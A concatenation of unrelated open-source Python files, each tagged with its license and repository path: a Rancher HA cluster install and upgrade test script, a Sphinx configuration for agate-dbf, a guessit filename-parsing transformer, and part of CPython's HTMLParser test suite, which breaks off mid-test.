run_command_with_stderr(cmd) install_eks_ingress() extra_settings.append( "--set ingress." "extraAnnotations.\"kubernetes\\.io/ingress\\.class\"=nginx" ) elif RANCHER_LOCAL_CLUSTER_TYPE == "AKS": create_aks_cluster() install_aks_ingress() extra_settings.append( "--set ingress." 
"extraAnnotations.\"kubernetes\\.io/ingress\\.class\"=nginx" ) else: write_kubeconfig() # wait until the cluster is ready def valid_response(): output = run_command_with_stderr(export_cmd + " && kubectl get nodes") return "Ready" in output.decode() try: wait_for(valid_response) except Exception as e: print("Error: {0}".format(e)) assert False, "check the logs in console for details" print_kubeconfig() if cm_install: install_cert_manager() add_repo_create_namespace() # Here we use helm to install the Rancher chart install_rancher(extra_settings=extra_settings) if RANCHER_LOCAL_CLUSTER_TYPE == "EKS": # For EKS we need to wait for EKS to generate the nlb and then configure # a Route53 record with the ingress address value set_route53_with_eks_ingress() if RANCHER_LOCAL_CLUSTER_TYPE == "AKS": set_route53_with_aks_ingress() wait_for_status_code(url=RANCHER_SERVER_URL + "/v3", expected_code=401) auth_url = \ RANCHER_SERVER_URL + "/v3-public/localproviders/local?action=login" wait_for_status_code(url=auth_url, expected_code=200) admin_client = set_url_and_password(RANCHER_SERVER_URL) cluster = get_cluster_by_name(admin_client, "local") validate_cluster_state(admin_client, cluster, False) if RANCHER_ADD_CUSTOM_CLUSTER.upper() == "TRUE": print("creating an custom cluster") create_custom_cluster(admin_client) def create_custom_cluster(admin_client): auth_url = RANCHER_SERVER_URL + \ "/v3-public/localproviders/local?action=login" wait_for_status_code(url=auth_url, expected_code=200) user, user_token = create_user(admin_client, auth_url) aws_nodes = \ AmazonWebServices().create_multiple_nodes( 5, random_test_name(resource_prefix + "-custom")) node_roles = [["controlplane"], ["etcd"], ["worker"], ["worker"], ["worker"]] client = rancher.Client(url=RANCHER_SERVER_URL + "/v3", token=user_token, verify=False) cluster = client.create_cluster( name=random_name(), driver="rancherKubernetesEngine", rancherKubernetesEngineConfig=rke_config) assert cluster.state == "provisioning" i = 0 
for aws_node in aws_nodes: docker_run_cmd = \ get_custom_host_registration_cmd( client, cluster, node_roles[i], aws_node) aws_node.execute_command(docker_run_cmd) i += 1 validate_cluster(client, cluster, userToken=user_token) def test_upgrade_rancher_ha(precheck_upgrade_options): write_kubeconfig() add_repo_create_namespace() install_rancher(upgrade=True) def create_resources_eks(): cluster_name = resource_prefix + "-ekscluster" AmazonWebServices().create_eks_cluster(cluster_name) AmazonWebServices().wait_for_eks_cluster_state(cluster_name, "ACTIVE") def create_resources(): # Create nlb and grab ARN & dns name lb = AmazonWebServices().create_network_lb(name=resource_prefix + "-nlb") lbArn = lb["LoadBalancers"][0]["LoadBalancerArn"] lbDns = lb["LoadBalancers"][0]["DNSName"] # Upsert the route53 record -- if it exists, update, if not, insert AmazonWebServices().upsert_route_53_record_cname(RANCHER_HA_HOSTNAME, lbDns) # Create the target groups tg80 = AmazonWebServices(). \ create_ha_target_group(80, resource_prefix + "-tg-80") tg443 = AmazonWebServices(). 
\ create_ha_target_group(443, resource_prefix + "-tg-443") tg80Arn = tg80["TargetGroups"][0]["TargetGroupArn"] tg443Arn = tg443["TargetGroups"][0]["TargetGroupArn"] # Create listeners for the load balancer, to forward to the target groups AmazonWebServices().create_ha_nlb_listener(loadBalancerARN=lbArn, port=80, targetGroupARN=tg80Arn) AmazonWebServices().create_ha_nlb_listener(loadBalancerARN=lbArn, port=443, targetGroupARN=tg443Arn) targets = [] aws_nodes = AmazonWebServices().\ create_multiple_nodes(3, resource_prefix + "-server") assert len(aws_nodes) == 3 for aws_node in aws_nodes: print(aws_node.public_ip_address) targets.append(aws_node.provider_node_id) # Register the nodes to the target groups targets_list = [dict(Id=target_id, Port=80) for target_id in targets] AmazonWebServices().register_targets(targets_list, tg80Arn) targets_list = [dict(Id=target_id, Port=443) for target_id in targets] AmazonWebServices().register_targets(targets_list, tg443Arn) return aws_nodes def install_cert_manager(): manifests = "https://github.com/jetstack/cert-manager/releases/download/" \ "{0}/cert-manager.crds.yaml".format(CERT_MANAGER_VERSION) cm_repo = "https://charts.jetstack.io" run_command_with_stderr(export_cmd + " && kubectl apply -f " + manifests) run_command_with_stderr("helm_v3 repo add jetstack " + cm_repo) run_command_with_stderr("helm_v3 repo update") run_command_with_stderr(export_cmd + " && " + "kubectl create namespace cert-manager") run_command_with_stderr(export_cmd + " && " + "helm_v3 install cert-manager " "jetstack/cert-manager " "--namespace cert-manager " "--version {0}".format(CERT_MANAGER_VERSION)) time.sleep(120) def install_eks_ingress(): run_command_with_stderr(export_cmd + " && kubectl apply -f " + DATA_SUBDIR + "/eks_nlb.yml") def set_route53_with_eks_ingress(): kubectl_ingress = "kubectl get ingress -n cattle-system -o " \ "jsonpath=\"" \ "{.items[0].status.loadBalancer.ingress[0].hostname}\"" ingress_address = 
run_command_with_stderr(export_cmd + " && " + kubectl_ingress).decode() AmazonWebServices().upsert_route_53_record_cname(RANCHER_HA_HOSTNAME, ingress_address) time.sleep(60) def set_route53_with_aks_ingress(): kubectl_ingress = "kubectl get svc -n ingress-nginx " \ "ingress-nginx-controller -o " \ "jsonpath=\"" \ "{.status.loadBalancer.ingress[0].ip}\"" time.sleep(10) ingress_address = run_command_with_stderr(export_cmd + " && " + kubectl_ingress).decode() print("AKS INGRESS ADDRESS:") print(ingress_address) AmazonWebServices().upsert_route_53_record_cname(RANCHER_HA_HOSTNAME, ingress_address, record_type='A') time.sleep(60) def add_repo_create_namespace(repo=RANCHER_HELM_REPO): repo_name = "rancher-" + repo repo_url = "https://releases.rancher.com/server-charts/" + repo run_command_with_stderr("helm_v3 repo add " + repo_name + " " + repo_url) run_command_with_stderr("helm_v3 repo update") run_command_with_stderr(export_cmd + " && " + "kubectl create namespace cattle-system") def install_rancher(type=RANCHER_HA_CERT_OPTION, repo=RANCHER_HELM_REPO, upgrade=False, extra_settings=None): operation = "install" if upgrade: operation = "upgrade" helm_rancher_cmd = \ export_cmd + " && helm_v3 " + operation + " rancher " + \ "rancher-" + repo + "/rancher " + \ "--version " + RANCHER_CHART_VERSION + " " + \ "--namespace cattle-system " + \ "--set hostname=" + RANCHER_HA_HOSTNAME if type == 'letsencrypt': helm_rancher_cmd = \ helm_rancher_cmd + \ " --set ingress.tls.source=letsEncrypt " + \ "--set letsEncrypt.email=" + \ RANCHER_LETSENCRYPT_EMAIL elif type == 'byo-self-signed': helm_rancher_cmd = \ helm_rancher_cmd + \ " --set ingress.tls.source=secret " + \ "--set privateCA=true" elif type == 'byo-valid': helm_rancher_cmd = \ helm_rancher_cmd + \ " --set ingress.tls.source=secret" if RANCHER_IMAGE_TAG != "" and RANCHER_IMAGE_TAG is not None: helm_rancher_cmd = \ helm_rancher_cmd + \ " --set rancherImageTag=" + RANCHER_IMAGE_TAG if operation == "install": if type == 
"byo-self-signed": create_tls_secrets(valid_cert=False) elif type == "byo-valid": create_tls_secrets(valid_cert=True) if RANCHER_HELM_EXTRA_SETTINGS: extra_settings.append(RANCHER_HELM_EXTRA_SETTINGS) if extra_settings: for setting in extra_settings: helm_rancher_cmd = helm_rancher_cmd + " " + setting run_command_with_stderr(helm_rancher_cmd) time.sleep(120) # set trace logging set_trace_cmd = "kubectl -n cattle-system get pods -l app=rancher " + \ "--no-headers -o custom-columns=name:.metadata.name | " + \ "while read rancherpod; do kubectl -n cattle-system " + \ "exec $rancherpod -c rancher -- loglevel --set trace; done" run_command_with_stderr(set_trace_cmd) def create_tls_secrets(valid_cert): cert_path = DATA_SUBDIR + "/tls.crt" key_path = DATA_SUBDIR + "/tls.key" ca_path = DATA_SUBDIR + "/cacerts.pem" if valid_cert: # write files from env var write_encoded_certs(cert_path, RANCHER_VALID_TLS_CERT) write_encoded_certs(key_path, RANCHER_VALID_TLS_KEY) else: write_encoded_certs(cert_path, RANCHER_BYO_TLS_CERT) write_encoded_certs(key_path, RANCHER_BYO_TLS_KEY) write_encoded_certs(ca_path, RANCHER_PRIVATE_CA_CERT) tls_command = export_cmd + " && kubectl -n cattle-system " \ "create secret tls tls-rancher-ingress " \ "--cert=" + cert_path + " --key=" + key_path ca_command = export_cmd + " && kubectl -n cattle-system " \ "create secret generic tls-ca " \ "--from-file=" + ca_path run_command_with_stderr(tls_command) if not valid_cert: run_command_with_stderr(ca_command) def write_encoded_certs(path, contents): file = open(path, "w") file.write(base64.b64decode(contents).decode("utf-8")) file.close() def write_kubeconfig(): file = open(kubeconfig_path, "w") file.write(base64.b64decode(RANCHER_HA_KUBECONFIG).decode("utf-8")) file.close() def set_url_and_password(rancher_url, server_url=None): admin_token = set_url_password_token(rancher_url, server_url) admin_client = rancher.Client(url=rancher_url + "/v3", token=admin_token, verify=False) auth_url = rancher_url + 
"/v3-public/localproviders/local?action=login" user, user_token = create_user(admin_client, auth_url) env_details = "env.CATTLE_TEST_URL='" + rancher_url + "'\n" env_details += "env.ADMIN_TOKEN='" + admin_token + "'\n" env_details += "env.USER_TOKEN='" + user_token + "'\n" create_config_file(env_details) return admin_client def create_rke_cluster(config_path): rke_cmd = "rke --version && rke up --config " + config_path run_command_with_stderr(rke_cmd) def print_kubeconfig(): kubeconfig_file = open(kubeconfig_path, "r") kubeconfig_contents = kubeconfig_file.read() kubeconfig_file.close() kubeconfig_contents_encoded = base64.b64encode( kubeconfig_contents.encode("utf-8")).decode("utf-8") print("\n\n" + kubeconfig_contents + "\n\n") print("\nBase64 encoded: \n\n" + kubeconfig_contents_encoded + "\n\n") def create_rke_cluster_config(aws_nodes): configfile = "cluster-ha.yml" rkeconfig = readDataFile(DATA_SUBDIR, configfile) rkeconfig = rkeconfig.replace("$ip1", aws_nodes[0].public_ip_address) rkeconfig = rkeconfig.replace("$ip2", aws_nodes[1].public_ip_address) rkeconfig = rkeconfig.replace("$ip3", aws_nodes[2].public_ip_address) rkeconfig = rkeconfig.replace("$internalIp1", aws_nodes[0].private_ip_address) rkeconfig = rkeconfig.replace("$internalIp2", aws_nodes[1].private_ip_address) rkeconfig = rkeconfig.replace("$internalIp3", aws_nodes[2].private_ip_address) rkeconfig = rkeconfig.replace("$user1", aws_nodes[0].ssh_user) rkeconfig = rkeconfig.replace("$user2", aws_nodes[1].ssh_user) rkeconfig = rkeconfig.replace("$user3", aws_nodes[2].ssh_user) rkeconfig = rkeconfig.replace("$AWS_SSH_KEY_NAME", AWS_SSH_KEY_NAME) rkeconfig = rkeconfig.replace("$KUBERNETES_VERSION", KUBERNETES_VERSION) print("cluster-ha-filled.yml: \n" + rkeconfig + "\n") clusterfilepath = DATA_SUBDIR + "/" + "cluster-ha-filled.yml" f = open(clusterfilepath, "w") f.write(rkeconfig) f.close() return clusterfilepath def create_aks_cluster(): tf_dir = DATA_SUBDIR + "/" + "terraform/aks" aks_k8_s_version = 
os.environ.get('RANCHER_AKS_K8S_VERSION', '') aks_location = os.environ.get('RANCHER_AKS_LOCATION', '') client_id = os.environ.get('ARM_CLIENT_ID', '') client_secret = os.environ.get('ARM_CLIENT_SECRET', '') tf = Terraform(working_dir=tf_dir, variables={'kubernetes_version': aks_k8_s_version, 'location': aks_location, 'client_id': client_id, 'client_secret': client_secret, 'cluster_name': resource_prefix}) print("Creating cluster") tf.init() print(tf.plan(out="aks_plan_server.out")) print("\n\n") print(tf.apply("--auto-approve")) print("\n\n") out_string = tf.output("kube_config", full_value=True) with open(kubeconfig_path, "w") as kubefile: kubefile.write(out_string) def install_aks_ingress(): run_command_with_stderr(export_cmd + " && kubectl apply -f " + DATA_SUBDIR + "/aks_nlb.yml") @pytest.fixture(scope='module') def precheck_certificate_options(): if RANCHER_HA_CERT_OPTION == 'byo-valid': if RANCHER_VALID_TLS_CERT == '' or \ RANCHER_VALID_TLS_KEY == '' or \ RANCHER_VALID_TLS_CERT is None or \ RANCHER_VALID_TLS_KEY is None: raise pytest.skip( 'Valid certificates not found in environment variables') elif RANCHER_HA_CERT_OPTION == 'byo-self-signed': if RANCHER_BYO_TLS_CERT == '' or \ RANCHER_BYO_TLS_KEY == '' or \ RANCHER_PRIVATE_CA_CERT == '' or \ RANCHER_BYO_TLS_CERT is None or \ RANCHER_BYO_TLS_KEY is None or \ RANCHER_PRIVATE_CA_CERT is None: raise pytest.skip( 'Self signed certificates not found in environment variables') elif RANCHER_HA_CERT_OPTION == 'letsencrypt': if RANCHER_LETSENCRYPT_EMAIL == '' or \ RANCHER_LETSENCRYPT_EMAIL is None: raise pytest.skip( 'LetsEncrypt email is not found in environment variables') @pytest.fixture(scope='module') def precheck_upgrade_options(): if RANCHER_HA_KUBECONFIG == '' or RANCHER_HA_KUBECONFIG is None: raise pytest.skip('Kubeconfig is not found for upgrade!') if RANCHER_HA_HOSTNAME == '' or RANCHER_HA_HOSTNAME is None: raise pytest.skip('Hostname is not found for upgrade!')
apache-2.0
onyxfish/agate-dbf
docs/conf.py
2
7302
# -*- coding: utf-8 -*- # # This file is execfile()d with the current directory set to its containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import os import sys # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. sys.path.insert(0, os.path.abspath('..')) # -- General configuration ----------------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be extensions # coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx'] autodoc_member_order = 'bysource' intersphinx_mapping = { 'python': ('http://docs.python.org/3.5/', None), 'agate': ('http://agate.readthedocs.org/en/latest/', None) } # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = u'agate-dbf' copyright = u'2015, Christopher Groskopf' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '0.2.3' # The full version, including alpha/beta/rc tags. release = '0.2.3' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. 
#language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ['_build'] # The reST default role (used for this markup: `text`) to use for all documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # -- Options for HTML output --------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'default' on_rtd = os.environ.get('READTHEDOCS', None) == 'True' if not on_rtd: # only import and set the theme if we're building docs locally import sphinx_rtd_theme html_theme = 'sphinx_rtd_theme' html_theme_path = [sphinx_rtd_theme.get_html_theme_path()] # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. 
#html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Output file base name for HTML help builder. 
htmlhelp_basename = 'agatedbfdoc' # -- Options for LaTeX output -------------------------------------------------- # The paper size ('letter' or 'a4'). #latex_paper_size = 'letter' # The font size ('10pt', '11pt' or '12pt'). #latex_font_size = '10pt' # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, documentclass [howto/manual]). latex_documents = [ ('index', 'agate-dbf.tex', u'agate-dbf Documentation', u'Christopher Groskopf', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Additional stuff for the LaTeX preamble. #latex_preamble = '' # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output -------------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ ]
mit
giggsey/SickRage
lib/guessit/transfo/split_explicit_groups.py
28
2804
#!/usr/bin/env python # -*- coding: utf-8 -*- # # GuessIt - A library for guessing information from filenames # Copyright (c) 2013 Nicolas Wack <wackou@gmail.com> # # GuessIt is free software; you can redistribute it and/or modify it under # the terms of the Lesser GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # GuessIt is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # Lesser GNU General Public License for more details. # # You should have received a copy of the Lesser GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # from __future__ import absolute_import, division, print_function, unicode_literals from functools import reduce from guessit.plugins.transformers import Transformer from guessit.textutils import find_first_level_groups from guessit.patterns import group_delimiters class SplitExplicitGroups(Transformer): def __init__(self): Transformer.__init__(self, 250) def process(self, mtree, options=None): """split each of those into explicit groups (separated by parentheses or square brackets) :return: return the string split into explicit groups, that is, those either between parenthese, square brackets or curly braces, and those separated by a dash.""" for c in mtree.unidentified_leaves(): groups = find_first_level_groups(c.value, group_delimiters[0]) for delimiters in group_delimiters: flatten = lambda l, x: l + find_first_level_groups(x, delimiters) groups = reduce(flatten, groups, []) # do not do this at this moment, it is not strong enough and can break other # patterns, such as dates, etc... 
# groups = functools.reduce(lambda l, x: l + x.split('-'), groups, []) c.split_on_components(groups, category='explicit') def post_process(self, mtree, options=None): """ Decrease confidence for properties found in explicit groups. :param mtree: :param options: :return: """ if not options.get('name_only'): explicit_nodes = [node for node in mtree.nodes() if node.category == 'explicit' and node.is_explicit()] for explicit_node in explicit_nodes: self.alter_confidence(explicit_node, 0.5) def alter_confidence(self, node, factor): for guess in node.guesses: for k in guess.keys(): confidence = guess.confidence(k) guess.set_confidence(k, confidence * factor)
gpl-3.0
wdv4758h/ZipPy
lib-python/3/test/test_htmlparser.py
2
29466
"""Tests for HTMLParser.py.""" import html.parser import pprint import unittest from test import support class EventCollector(html.parser.HTMLParser): def __init__(self, *args, **kw): self.events = [] self.append = self.events.append html.parser.HTMLParser.__init__(self, *args, **kw) def get_events(self): # Normalize the list of events so that buffer artefacts don't # separate runs of contiguous characters. L = [] prevtype = None for event in self.events: type = event[0] if type == prevtype == "data": L[-1] = ("data", L[-1][1] + event[1]) else: L.append(event) prevtype = type self.events = L return L # structure markup def handle_starttag(self, tag, attrs): self.append(("starttag", tag, attrs)) def handle_startendtag(self, tag, attrs): self.append(("startendtag", tag, attrs)) def handle_endtag(self, tag): self.append(("endtag", tag)) # all other markup def handle_comment(self, data): self.append(("comment", data)) def handle_charref(self, data): self.append(("charref", data)) def handle_data(self, data): self.append(("data", data)) def handle_decl(self, data): self.append(("decl", data)) def handle_entityref(self, data): self.append(("entityref", data)) def handle_pi(self, data): self.append(("pi", data)) def unknown_decl(self, decl): self.append(("unknown decl", decl)) class EventCollectorExtra(EventCollector): def handle_starttag(self, tag, attrs): EventCollector.handle_starttag(self, tag, attrs) self.append(("starttag_text", self.get_starttag_text())) class TestCaseBase(unittest.TestCase): def get_collector(self): raise NotImplementedError def _run_check(self, source, expected_events, collector=None): if collector is None: collector = self.get_collector() parser = collector for s in source: parser.feed(s) parser.close() events = parser.get_events() if events != expected_events: self.fail("received events did not match expected events\n" "Expected:\n" + pprint.pformat(expected_events) + "\nReceived:\n" + pprint.pformat(events)) def _run_check_extra(self, source, 
events): self._run_check(source, events, EventCollectorExtra()) def _parse_error(self, source): def parse(source=source): parser = self.get_collector() parser.feed(source) parser.close() self.assertRaises(html.parser.HTMLParseError, parse) class HTMLParserStrictTestCase(TestCaseBase): def get_collector(self): return EventCollector(strict=True) def test_processing_instruction_only(self): self._run_check("<?processing instruction>", [ ("pi", "processing instruction"), ]) self._run_check("<?processing instruction ?>", [ ("pi", "processing instruction ?"), ]) def test_simple_html(self): self._run_check(""" <!DOCTYPE html PUBLIC 'foo'> <HTML>&entity;&#32; <!--comment1a -></foo><bar>&lt;<?pi?></foo<bar comment1b--> <Img sRc='Bar' isMAP>sample text &#x201C; <!--comment2a-- --comment2b--> </Html> """, [ ("data", "\n"), ("decl", "DOCTYPE html PUBLIC 'foo'"), ("data", "\n"), ("starttag", "html", []), ("entityref", "entity"), ("charref", "32"), ("data", "\n"), ("comment", "comment1a\n-></foo><bar>&lt;<?pi?></foo<bar\ncomment1b"), ("data", "\n"), ("starttag", "img", [("src", "Bar"), ("ismap", None)]), ("data", "sample\ntext\n"), ("charref", "x201C"), ("data", "\n"), ("comment", "comment2a-- --comment2b"), ("data", "\n"), ("endtag", "html"), ("data", "\n"), ]) def test_malformatted_charref(self): self._run_check("<p>&#bad;</p>", [ ("starttag", "p", []), ("data", "&#bad;"), ("endtag", "p"), ]) def test_unclosed_entityref(self): self._run_check("&entityref foo", [ ("entityref", "entityref"), ("data", " foo"), ]) def test_bad_nesting(self): # Strangely, this *is* supposed to test that overlapping # elements are allowed. HTMLParser is more geared toward # lexing the input that parsing the structure. 
self._run_check("<a><b></a></b>", [ ("starttag", "a", []), ("starttag", "b", []), ("endtag", "a"), ("endtag", "b"), ]) def test_bare_ampersands(self): self._run_check("this text & contains & ampersands &", [ ("data", "this text & contains & ampersands &"), ]) def test_bare_pointy_brackets(self): self._run_check("this < text > contains < bare>pointy< brackets", [ ("data", "this < text > contains < bare>pointy< brackets"), ]) def test_illegal_declarations(self): self._parse_error('<!spacer type="block" height="25">') def test_starttag_end_boundary(self): self._run_check("""<a b='<'>""", [("starttag", "a", [("b", "<")])]) self._run_check("""<a b='>'>""", [("starttag", "a", [("b", ">")])]) def test_buffer_artefacts(self): output = [("starttag", "a", [("b", "<")])] self._run_check(["<a b='<'>"], output) self._run_check(["<a ", "b='<'>"], output) self._run_check(["<a b", "='<'>"], output) self._run_check(["<a b=", "'<'>"], output) self._run_check(["<a b='<", "'>"], output) self._run_check(["<a b='<'", ">"], output) output = [("starttag", "a", [("b", ">")])] self._run_check(["<a b='>'>"], output) self._run_check(["<a ", "b='>'>"], output) self._run_check(["<a b", "='>'>"], output) self._run_check(["<a b=", "'>'>"], output) self._run_check(["<a b='>", "'>"], output) self._run_check(["<a b='>'", ">"], output) output = [("comment", "abc")] self._run_check(["", "<!--abc-->"], output) self._run_check(["<", "!--abc-->"], output) self._run_check(["<!", "--abc-->"], output) self._run_check(["<!-", "-abc-->"], output) self._run_check(["<!--", "abc-->"], output) self._run_check(["<!--a", "bc-->"], output) self._run_check(["<!--ab", "c-->"], output) self._run_check(["<!--abc", "-->"], output) self._run_check(["<!--abc-", "->"], output) self._run_check(["<!--abc--", ">"], output) self._run_check(["<!--abc-->", ""], output) def test_starttag_junk_chars(self): self._parse_error("</>") self._parse_error("</$>") self._parse_error("</") self._parse_error("</a") self._parse_error("<a<a>") 
self._parse_error("</a<a>") self._parse_error("<!") self._parse_error("<a") self._parse_error("<a foo='bar'") self._parse_error("<a foo='bar") self._parse_error("<a foo='>'") self._parse_error("<a foo='>") def test_valid_doctypes(self): # from http://www.w3.org/QA/2002/04/valid-dtd-list.html dtds = ['HTML', # HTML5 doctype ('HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" ' '"http://www.w3.org/TR/html4/strict.dtd"'), ('HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" ' '"http://www.w3.org/TR/html4/loose.dtd"'), ('html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" ' '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"'), ('html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" ' '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd"'), ('math PUBLIC "-//W3C//DTD MathML 2.0//EN" ' '"http://www.w3.org/Math/DTD/mathml2/mathml2.dtd"'), ('html PUBLIC "-//W3C//DTD ' 'XHTML 1.1 plus MathML 2.0 plus SVG 1.1//EN" ' '"http://www.w3.org/2002/04/xhtml-math-svg/xhtml-math-svg.dtd"'), ('svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ' '"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"'), 'html PUBLIC "-//IETF//DTD HTML 2.0//EN"', 'html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"'] for dtd in dtds: self._run_check("<!DOCTYPE %s>" % dtd, [('decl', 'DOCTYPE ' + dtd)]) def test_declaration_junk_chars(self): self._parse_error("<!DOCTYPE foo $ >") def test_startendtag(self): self._run_check("<p/>", [ ("startendtag", "p", []), ]) self._run_check("<p></p>", [ ("starttag", "p", []), ("endtag", "p"), ]) self._run_check("<p><img src='foo' /></p>", [ ("starttag", "p", []), ("startendtag", "img", [("src", "foo")]), ("endtag", "p"), ]) def test_get_starttag_text(self): s = """<foo:bar \n one="1"\ttwo=2 >""" self._run_check_extra(s, [ ("starttag", "foo:bar", [("one", "1"), ("two", "2")]), ("starttag_text", s)]) def test_cdata_content(self): contents = [ '<!-- not a comment --> &not-an-entity-ref;', "<not a='start tag'>", '<a href="" /> <p> <span></span>', 'foo = "</scr" + "ipt>";', 'foo = "</SCRIPT" + ">";', 'foo = 
<\n/script> ', '<!-- document.write("</scr" + "ipt>"); -->', ('\n//<![CDATA[\n' 'document.write(\'<s\'+\'cript type="text/javascript" ' 'src="http://www.example.org/r=\'+new ' 'Date().getTime()+\'"><\\/s\'+\'cript>\');\n//]]>'), '\n<!-- //\nvar foo = 3.14;\n// -->\n', 'foo = "</sty" + "le>";', '<!-- \u2603 -->', # these two should be invalid according to the HTML 5 spec, # section 8.1.2.2 #'foo = </\nscript>', #'foo = </ script>', ] elements = ['script', 'style', 'SCRIPT', 'STYLE', 'Script', 'Style'] for content in contents: for element in elements: element_lower = element.lower() s = '<{element}>{content}</{element}>'.format(element=element, content=content) self._run_check(s, [("starttag", element_lower, []), ("data", content), ("endtag", element_lower)]) def test_cdata_with_closing_tags(self): # see issue #13358 # make sure that HTMLParser calls handle_data only once for each CDATA. # The normal event collector normalizes the events in get_events, # so we override it to return the original list of events. class Collector(EventCollector): def get_events(self): return self.events content = """<!-- not a comment --> &not-an-entity-ref; <a href="" /> </p><p> <span></span></style> '</script' + '>'""" for element in [' script', 'script ', ' script ', '\nscript', 'script\n', '\nscript\n']: element_lower = element.lower().strip() s = '<script>{content}</{element}>'.format(element=element, content=content) self._run_check(s, [("starttag", element_lower, []), ("data", content), ("endtag", element_lower)], collector=Collector()) def test_comments(self): html = ("<!-- I'm a valid comment -->" '<!--me too!-->' '<!------>' '<!---->' '<!----I have many hyphens---->' '<!-- I have a > in the middle -->' '<!-- and I have -- in the middle! -->') expected = [('comment', " I'm a valid comment "), ('comment', 'me too!'), ('comment', '--'), ('comment', ''), ('comment', '--I have many hyphens--'), ('comment', ' I have a > in the middle '), ('comment', ' and I have -- in the middle! 
')] self._run_check(html, expected) def test_condcoms(self): html = ('<!--[if IE & !(lte IE 8)]>aren\'t<![endif]-->' '<!--[if IE 8]>condcoms<![endif]-->' '<!--[if lte IE 7]>pretty?<![endif]-->') expected = [('comment', "[if IE & !(lte IE 8)]>aren't<![endif]"), ('comment', '[if IE 8]>condcoms<![endif]'), ('comment', '[if lte IE 7]>pretty?<![endif]')] self._run_check(html, expected) class HTMLParserTolerantTestCase(HTMLParserStrictTestCase): def get_collector(self): return EventCollector(strict=False) def test_tolerant_parsing(self): self._run_check('<html <html>te>>xt&a<<bc</a></html>\n' '<img src="URL><//img></html</html>', [ ('starttag', 'html', [('<html', None)]), ('data', 'te>>xt'), ('entityref', 'a'), ('data', '<<bc'), ('endtag', 'a'), ('endtag', 'html'), ('data', '\n<img src="URL>'), ('comment', '/img'), ('endtag', 'html<')]) def test_starttag_junk_chars(self): self._run_check("</>", []) self._run_check("</$>", [('comment', '$')]) self._run_check("</", [('data', '</')]) self._run_check("</a", [('data', '</a')]) # XXX this might be wrong self._run_check("<a<a>", [('data', '<a'), ('starttag', 'a', [])]) self._run_check("</a<a>", [('endtag', 'a<a')]) self._run_check("<!", [('data', '<!')]) 